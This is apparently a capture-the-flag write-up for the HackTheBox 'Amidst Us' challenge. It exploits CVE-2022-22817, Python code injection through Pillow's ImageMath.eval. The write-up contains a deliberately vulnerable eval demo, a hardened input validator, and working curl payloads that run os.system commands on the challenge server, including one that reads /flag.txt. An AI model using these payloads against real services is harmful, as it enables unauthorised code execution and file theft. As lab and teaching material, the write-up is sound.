HackTheBox Amidst Us Challenge
https://app.hackthebox.com/challenges/325
Description
The Amidst-Us tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and Bonnie infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?
Exploitation
The portal exposes POST /api/alphafy, which takes a JSON body with a base64-encoded PNG ("image") and a background colour as a three-element array ("background"). The colour components end up inside the expression string handed to PIL.ImageMath.eval, and Pillow before 9.0.0 evaluated that expression with Python's eval (CVE-2022-22817, the Snyk entry below). A string in the first slot of "background" is therefore executed as Python on the server; the two remaining channel values just have to be present so the array still unpacks.
https://security.snyk.io/vuln/SNYK-PYTHON-PILLOW-2331901
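To make the sink concrete, here is an added stand-in for the vulnerable pattern beside a hardened version of the input check. This is example code, not the challenge source and not Pillow's code: the expression text is an assumption about the shape of the server code, the only thing taken from the challenge is the injection position (a colour channel). The unsafe path mirrors what old Pillow did, eval() with a namespace that lacks __builtins__, so Python supplies the real builtins and exec()/__import__ are reachable.

```python
# Added example (not from the writeup or the challenge source): a stand-in for the
# ImageMath.eval sink. Pillow < 9.0.0 passed the expression to Python's eval with
# the builtins reachable (CVE-2022-22817), so text interpolated into the expression
# runs as Python. The expression below is an assumption about the shape of the
# server code; only the injection position (a "colour channel") is taken from the
# challenge payload.
import os

MARKER_ENV = "AMIDST_US_MARK"  # set by the demo payload instead of running a command


def build_expression(background):
    """Vulnerable shape: channel values are formatted straight into the expression."""
    br, bg, bb = background
    return f"convert(((r - {br}) ** 2 + (g - {bg}) ** 2 + (b - {bb}) ** 2) ** 0.5, 'L')"


def unsafe_eval(expression, **bands):
    """Mirror of the old Pillow behaviour: eval() with a namespace lacking
    __builtins__, so Python supplies the real builtins and exec/__import__ work."""
    namespace = {"convert": lambda value, mode: (value, mode)}  # stand-in for ImageMath's convert
    namespace.update(bands)
    return eval(expression, namespace)  # deliberately vulnerable


def run_unsafe(background):
    """Run the vulnerable path with stand-in band values. Returns (result, error_name).
    Side effects of an injected payload happen even when the expression then fails."""
    try:
        return unsafe_eval(build_expression(background), r=10, g=20, b=30), None
    except Exception as exc:  # exec() returns None, so the arithmetic then raises
        return None, type(exc).__name__


def demo_payload():
    """Same structure as the challenge payload, with a harmless side effect."""
    return f"exec(\"import os; os.environ['{MARKER_ENV}'] = 'hit'\")"


def marker_value():
    """What the injected code left behind, if it ran."""
    return os.environ.get(MARKER_ENV)


def parse_background(value):
    """Hardened: exactly three ints in 0..255. Anything else never reaches the expression."""
    if not isinstance(value, list) or len(value) != 3:
        raise ValueError("background must be a list of three channel values")
    channels = []
    for channel in value:
        # bool is a subclass of int; reject it explicitly
        if isinstance(channel, bool) or not isinstance(channel, int):
            raise ValueError("channel must be an int")
        if not 0 <= channel <= 255:
            raise ValueError("channel out of range")
        channels.append(channel)
    return tuple(channels)


def is_valid_background(value):
    """Boolean wrapper around parse_background for quick checks."""
    try:
        parse_background(value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(build_expression([255, 255, 255]))
    print(run_unsafe([0, 0, 0]))
    print(run_unsafe([demo_payload(), 0, 0]), marker_value())
    print(is_valid_background([demo_payload(), 0, 0]), is_valid_background([0, 0, 0]))
```

The point the second print makes is the one that matters for the challenge: the injected call runs first, the expression only fails afterwards, so an error response from the server says nothing about whether the command executed. Validating the channels as ints before they touch the expression (and upgrading Pillow) closes the path; the name check added in Pillow 9.0.0 alone is not a substitute for typing the input.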
Check: confirm blind code execution with a time delay. The payload goes in the first colour channel; if the timed request takes about five seconds longer than a normal one, the command ran.
time curl 94.237.53.146:46950/api/alphafy -d '{"background":["exec(\"import os; os.system(\\\"sleep 5\\\")\")",255,255],"image":"'$(base64 challenge/application/static/images/arrow.png)'"}' -H 'Content-Type: application/json'
On GNU coreutils use base64 -w 0 here, otherwise the 76-column line wrapping puts raw newlines inside the JSON string and the body is rejected before it reaches the image code; macOS base64 does not wrap.
Exploit: copy the flag into the directory the app serves as /static, then fetch it over HTTP. A base64 1x1 PNG is inlined so the request stays small and does not depend on a local file. Shell double quotes are used here, so each backslash the JSON needs is doubled again for the shell.
curl 94.237.53.146:46950/api/alphafy \
-H 'Content-Type: application/json' \
-d "{\"background\":[\"exec('import os;os.system(\\\\'cat /flag.txt > /app/application/static/flag.txt\\\\')')\",0,0],\"image\":\"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==\"}"
curl 94.237.53.146:46950/static/flag.txt
Summary
Amidst Us: the background colour array reaches PIL.ImageMath.eval unsanitised (CVE-2022-22817), so a string in the first channel is Python code. Confirm with a sleep payload, then copy /flag.txt into the served static directory and read it over HTTP.